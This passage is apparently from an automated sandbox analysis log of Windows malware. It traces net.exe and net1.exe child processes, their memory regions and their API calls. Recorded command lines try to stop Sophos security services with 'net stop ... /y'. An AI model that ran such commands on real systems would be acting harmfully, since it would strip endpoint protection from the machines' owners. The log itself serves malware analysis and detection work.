"0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Web Control Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4234 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4235 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4236 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4237 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4238 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4239 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4240 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4241 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4242 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4243 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4244 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4245 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4246 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4247 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4248 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 411 os_tid = 0xf24 Process: id = "71" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x23467000" os_pid = "0xc4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "63" os_parent_pid = "0xf50" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos MCS Client\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4249 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4250 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4251 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4252 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4253 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4254 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4255 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4256 start_va = 0xffc40000 end_va = 0xffc72fff entry_point = 0xffc40000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4257 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4258 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4259 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4260 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4261 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4262 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4263 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4280 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4281 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4282 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4283 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4284 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 4285 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4286 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4287 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4288 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4289 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4290 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4291 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4292 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4293 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4294 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4295 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4296 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4297 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4298 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4299 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4300 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4301 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4302 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4342 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 413 os_tid = 0xfc0 [0083.972] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafab0 | out: lpSystemTimeAsFileTime=0xafab0*(dwLowDateTime=0xe737ac30, dwHighDateTime=0x1d48689)) [0083.972] GetCurrentProcessId () returned 0xc4c [0083.972] GetCurrentThreadId () returned 0xfc0 [0083.972] GetTickCount () returned 0x1ede6 [0083.972] QueryPerformanceCounter (in: lpPerformanceCount=0xafab8 | out: lpPerformanceCount=0xafab8*=1813089000000) returned 1 [0083.973] GetModuleHandleW (lpModuleName=0x0) returned 0xffc40000 [0083.973] __set_app_type (_Type=0x1) [0083.973] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc59c9c) returned 0x0 [0083.973] __getmainargs (in: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788, _DoWildCard=0, _StartInfo=0xffc6479c | out: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788) returned 0 [0083.973] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.973] GetConsoleOutputCP () returned 0x1b5 [0083.974] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffc6cec0 | out: lpCPInfo=0xffc6cec0) returned 1 [0083.974] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0083.975] sprintf_s (in: _DstBuf=0xafa58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0083.976] setlocale (category=0, locale=".437") returned="English_United States.437" [0083.977] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0083.977] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0083.977] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos MCS Client\" /y" [0083.977] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xaf7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0083.977] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0083.978] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafa48 | out: Buffer=0xafa48*=0x1b4d60) returned 0x0 [0083.978] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafa48 | out: Buffer=0xafa48*=0x1bc120) returned 0x0 [0083.978] _fileno (_File=0x7fefdba2a80) returned 0 [0083.978] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0083.978] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0083.978] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0083.978] _wcsicmp (_String1="config", _String2="stop") returned -16 [0083.978] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0083.978] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0083.978] _wcsicmp (_String1="file", _String2="stop") returned -13 [0083.978] _wcsicmp (_String1="files", _String2="stop") returned -13 [0083.978] _wcsicmp (_String1="group", _String2="stop") returned -12 [0083.978] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0083.978] _wcsicmp (_String1="help", _String2="stop") returned -11 [0083.978] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0083.978] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0083.978] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0083.978] _wcsicmp (_String1="session", _String2="stop") returned -15 [0083.978] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0083.978] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0083.978] _wcsicmp (_String1="share", _String2="stop") returned -12 [0083.978] _wcsicmp (_String1="start", _String2="stop") returned -14 [0083.978] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0083.978] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0083.978] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0083.978] _wcsicmp (_String1="accounts", _String2="Sophos MCS Client") returned -18 [0083.979] _wcsicmp (_String1="computer", _String2="Sophos MCS Client") returned -16 [0083.979] _wcsicmp (_String1="config", _String2="Sophos MCS Client") returned -16 [0083.979] _wcsicmp (_String1="continue", _String2="Sophos MCS Client") returned -16 [0083.979] _wcsicmp (_String1="cont", _String2="Sophos MCS Client") returned -16 [0083.979] _wcsicmp (_String1="file", _String2="Sophos MCS Client") returned -13 [0083.979] _wcsicmp (_String1="files", _String2="Sophos MCS Client") returned -13 [0083.979] _wcsicmp (_String1="group", _String2="Sophos MCS Client") returned -12 [0083.979] _wcsicmp (_String1="groups", _String2="Sophos MCS Client") returned -12 [0083.979] _wcsicmp (_String1="help", _String2="Sophos MCS Client") returned -11 [0083.979] _wcsicmp (_String1="helpmsg", _String2="Sophos MCS Client") returned -11 [0083.979] _wcsicmp (_String1="localgroup", _String2="Sophos MCS Client") returned -7 [0083.979] _wcsicmp (_String1="pause", _String2="Sophos MCS Client") returned -3 [0083.979] _wcsicmp (_String1="session", _String2="Sophos MCS Client") returned -10 [0083.979] _wcsicmp (_String1="sessions", _String2="Sophos MCS Client") returned -10 [0083.979] _wcsicmp (_String1="sess", _String2="Sophos MCS Client") returned -10 [0083.979] _wcsicmp (_String1="share", _String2="Sophos MCS Client") returned -7 [0083.979] _wcsicmp (_String1="start", _String2="Sophos MCS Client") returned 5 [0083.979] _wcsicmp (_String1="stats", _String2="Sophos MCS Client") returned 5 [0083.979] _wcsicmp (_String1="statistics", _String2="Sophos MCS Client") returned 5 [0083.979] _wcsicmp (_String1="stop", _String2="Sophos MCS Client") returned 5 [0083.979] _wcsicmp (_String1="time", _String2="Sophos MCS Client") returned 1 [0083.979] _wcsicmp (_String1="user", _String2="Sophos MCS Client") returned 2 [0083.979] _wcsicmp (_String1="users", _String2="Sophos MCS Client") returned 2 [0083.979] _wcsicmp (_String1="msg", _String2="Sophos MCS Client") returned -6 [0083.979] _wcsicmp (_String1="messenger", _String2="Sophos MCS Client") returned -6 [0083.979] _wcsicmp (_String1="receiver", _String2="Sophos MCS Client") returned -1 [0083.979] _wcsicmp (_String1="rcv", _String2="Sophos MCS Client") returned -1 [0083.979] _wcsicmp (_String1="netpopup", _String2="Sophos MCS Client") returned -5 [0083.979] _wcsicmp (_String1="redirector", _String2="Sophos MCS Client") returned -1 [0083.979] _wcsicmp (_String1="redir", _String2="Sophos MCS Client") returned -1 [0083.979] _wcsicmp (_String1="rdr", _String2="Sophos MCS Client") returned -1 [0083.979] _wcsicmp (_String1="workstation", _String2="Sophos MCS Client") returned 4 [0083.979] _wcsicmp (_String1="work", _String2="Sophos MCS Client") returned 4 [0083.979] _wcsicmp (_String1="wksta", _String2="Sophos MCS Client") returned 4 [0083.979] _wcsicmp (_String1="prdr", _String2="Sophos MCS Client") returned -3 [0083.980] _wcsicmp (_String1="devrdr", _String2="Sophos MCS Client") returned -15 [0083.980] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos MCS Client") returned -7 [0083.980] _wcsicmp (_String1="server", _String2="Sophos MCS Client") returned -10 [0083.980] _wcsicmp (_String1="svr", _String2="Sophos MCS Client") returned 7 [0083.980] _wcsicmp (_String1="srv", _String2="Sophos MCS Client") returned 3 [0083.980] _wcsicmp (_String1="lanmanserver", _String2="Sophos MCS Client") returned -7 [0083.980] _wcsicmp (_String1="alerter", _String2="Sophos MCS Client") returned -18 [0083.980] _wcsicmp (_String1="netlogon", _String2="Sophos MCS Client") returned -5 [0083.980] _wcsupr (in: _String="Sophos MCS Client" | out: _String="SOPHOS MCS CLIENT") returned="SOPHOS MCS CLIENT" [0083.980] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1bce30 [0084.111] GetServiceKeyNameW (in: hSCManager=0x1bce30, lpDisplayName="SOPHOS MCS CLIENT", lpServiceName=0xffc65750, lpcchBuffer=0xaf968 | out: lpServiceName="", lpcchBuffer=0xaf968) returned 0 [0084.112] _wcsicmp (_String1="msg", _String2="SOPHOS MCS CLIENT") returned -6 [0084.112] _wcsicmp (_String1="messenger", _String2="SOPHOS MCS CLIENT") returned -6 [0084.112] _wcsicmp (_String1="receiver", _String2="SOPHOS MCS CLIENT") returned -1 [0084.112] _wcsicmp (_String1="rcv", _String2="SOPHOS MCS CLIENT") returned -1 [0084.112] _wcsicmp (_String1="redirector", _String2="SOPHOS MCS CLIENT") returned -1 [0084.112] _wcsicmp (_String1="redir", _String2="SOPHOS MCS CLIENT") returned -1 [0084.112] _wcsicmp (_String1="rdr", _String2="SOPHOS MCS CLIENT") returned -1 [0084.112] _wcsicmp (_String1="workstation", _String2="SOPHOS MCS CLIENT") returned 4 [0084.112] _wcsicmp (_String1="work", _String2="SOPHOS MCS CLIENT") returned 4 [0084.112] _wcsicmp (_String1="wksta", _String2="SOPHOS MCS CLIENT") returned 4 [0084.112] _wcsicmp (_String1="prdr", _String2="SOPHOS MCS CLIENT") returned -3 [0084.112] _wcsicmp (_String1="devrdr", _String2="SOPHOS MCS CLIENT") returned -15 [0084.112] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS MCS CLIENT") returned -7 [0084.113] _wcsicmp (_String1="server", _String2="SOPHOS MCS CLIENT") returned -10 [0084.113] _wcsicmp (_String1="svr", _String2="SOPHOS MCS CLIENT") returned 7 [0084.113] _wcsicmp (_String1="srv", _String2="SOPHOS MCS CLIENT") returned 3 [0084.113] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS MCS CLIENT") returned -7 [0084.113] _wcsicmp (_String1="alerter", _String2="SOPHOS MCS CLIENT") returned -18 [0084.113] _wcsicmp (_String1="netlogon", _String2="SOPHOS MCS CLIENT") returned -5 [0084.113] NetServiceControl (in: servername=0x0, service="SOPHOS MCS CLIENT", opcode=0x0, arg=0x0, bufptr=0xaf970 | out: bufptr=0xaf970) returned 0x889 [0084.114] wcscpy_s (in: _Destination=0xffc680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0084.114] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0084.114] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0084.116] GetFileType (hFile=0xb) returned 0x2 [0084.116] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf838 | out: lpMode=0xaf838) returned 1 [0084.116] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xaf830, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0xaf830*=0x1e) returned 1 [0084.117] GetFileType (hFile=0xb) returned 0x2 [0084.117] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf838 | out: lpMode=0xaf838) returned 1 [0084.117] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf830, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0xaf830*=0x2) returned 1 [0084.117] _ultow (in: _Dest=0x889, _Radix=719008 | out: _Dest=0x889) returned="2185" [0084.117] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0084.117] GetFileType (hFile=0xb) returned 0x2 [0084.118] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf838 | out: lpMode=0xaf838) returned 1 [0084.118] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xaf830, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0xaf830*=0x34) returned 1 [0084.118] GetFileType (hFile=0xb) returned 0x2 [0084.118] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf838 | out: lpMode=0xaf838) returned 1 [0084.118] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf830, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0xaf830*=0x2) returned 1 [0084.119] NetApiBufferFree (Buffer=0x1b4d60) returned 0x0 [0084.119] NetApiBufferFree (Buffer=0x1bc120) returned 0x0 [0084.119] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos MCS Client\" /y" [0084.119] exit (_Code=2) Process: id = "72" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x21f2e000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "64" os_parent_pid = "0xff8" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Message Router\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4264 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4265 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4266 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4267 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4268 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4269 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4270 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4271 start_va = 0xffc40000 end_va = 0xffc72fff entry_point = 0xffc40000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4272 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4273 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4274 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4275 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4277 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 4278 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4279 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4303 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4304 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4305 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4306 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4307 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4308 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4309 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4310 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4311 start_va = 